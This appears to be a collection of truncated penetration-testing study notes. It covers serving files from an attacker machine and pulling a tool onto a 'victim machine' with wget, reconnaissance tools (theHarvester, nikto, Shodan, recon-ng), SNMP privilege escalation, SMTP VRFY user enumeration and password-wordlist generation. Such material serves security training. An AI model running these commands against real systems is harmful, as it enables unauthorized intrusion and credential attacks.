Python3 Via web: # On our machine: python3 -m http.server 8888 # On victim machine: wget http://10.10.16.5:8888/pspy64 chmod +x pspy64 Python2 python -m SimpleHTTPServer 7331 PHP php -S 0.0....

The Harvester theHarvester -d megacorpone.com -b google The Harvester doesn’t works really well on newer versions of Kali, use the docker image if that is the case. docker run -ti --rm thehar...

The simplest option is to set the -maxtime option, which will halt the scan after the specified time limit: nikto -host=http://www.megacorpone.com -maxtime=30s Our second option is to tune the sca...

Shodan Shodan Search Engine for connected devices over the Internet. You can use various filters while using shodan, among others are: hostname port country Censys Censys Search Engine ...

SNMP Priv Escalation If port 161 is open internally you can search for the /etc/snmp/snmpd.conf file and review its content, notice that private community is read and writable: rocommunity public...

VRFY USER ENUMERATION With user and IP as input by the user: #!/usr/bin/python import socket import sys if len(sys.argv) != 3: print("Usage: vrfy.py <IP> <users_list>") ...

TCP Scanning The -w option specifies the connection timeout in seconds and -z is used to specify zero-I/O mode, which will send no data and is used for scanning: nc -nvv -w 1 -z 10.11.1.220 3388-...

NBTSCAN nbtscan -r 10.11.1.0/24

Social-Searcher Useful resource to gather info from several social networks: Social-Searcher Twofi Scans a user’s Twitter feed and generates a personalized wordlist used for password attacks again...

To get started, let’s simply run recon-ng: kali@kali:~$ recon-ng [*] Version check disabled. /\ / \\ /\ Spon...